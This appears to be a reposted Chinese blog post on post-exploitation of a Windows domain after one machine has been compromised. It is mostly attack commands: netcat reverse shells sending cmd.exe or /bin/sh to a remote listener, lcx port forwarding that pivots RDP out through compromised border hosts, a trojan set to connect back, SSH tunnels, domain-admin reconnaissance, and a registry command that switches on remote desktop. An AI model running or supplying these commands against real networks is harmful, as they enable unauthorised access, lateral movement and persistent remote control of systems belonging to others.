后渗透之内网信息收集

内网域渗透的先决条件


首先你要能拿下一台域内的机器,然后才能开始域渗透。道理很简单,就不啰嗦了。介绍一些windows反弹shell的方法:

.\nc.exe -e cmd.exe 192.168.1.1 4444
.\nc 192.168.1.1 4444 -e /bin/sh 
nc -l 4444 -vvv

内网穿外网


方案一 正想开口等连接  
.\lcx.exe -slave 192.168.10.100 4444 192.168.20.201 3389 #192.168.20.201为内网肉机,192.168.10.100是边界肉机
.\lcx.exe -listen 4444 8888 #在边界肉机上
mstsc 192.168.10.100 8888 #在攻击者主机上
方案二 返向直接连回去  
木马会连地址20.20.20.10 #在内网肉机配置木马,反连20.20.20.10是边界肉机,上线端口8888
.\lcx.exe -listen 4444 8888 #在边界肉机上
.\lcx.exe -slave 20.20.20.10 4444 127.0.0.1 4444 #在攻击者主机上
关于ssh端口转发
ssh -C -f -N -g -L 55555:127.0.0.1:8080 [email protected] #本地端口(55555)到目标地址(127.0.0.1)的目标端口(8080),后面是必须ssh到对方应该是对段的username@IP地址
ssh -C -f -N -g -R 55555:127.0.0.1:8080 [email protected] #目标地址(127.0.0.1)的目标端口(8080)到本地端口(55555),后面是必须ssh到对方应该是对段的username@IP地址
ssh -C -f -N -g -D listen_port user@Tunnel_Host #不常用,动态监测
最后配置ssr代理
不详细介绍  

域渗透的信息收集


查询本机信息

    C:\Windows\system32>fsutil.exe fsinfo drives #查询盘符信息
    C:\Windows\system32>systeminfo #查询系统信息
    C:\Windows\system32>ipconfig /all #查询网络信息

查询域信息

    C:\Windows\system32>net view /domain#查询域
    C:\Windows\system32>net group /domain #查询组
    C:\Windows\system32>net user /domain #查询域用户
    C:\Windows\system32>net group “domain admins” /domain #查询域管信息
    C:\Windows\system32>net group "domain computer" /domain #查询域内机器信息

查看网络、服务、进程信息

    C:\Windows\system32>netstat -anb -p tcp#查询网络服务及PID
    C:\Windows\system32>tasklist #查看进程信息
    C:\Windows\system32>taskkill /f /im process-name #杀掉进程

一键开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

转载于:https://www.cnblogs.com/oneWhite/p/11173170.html

你可能感兴趣的:(后渗透之内网信息收集)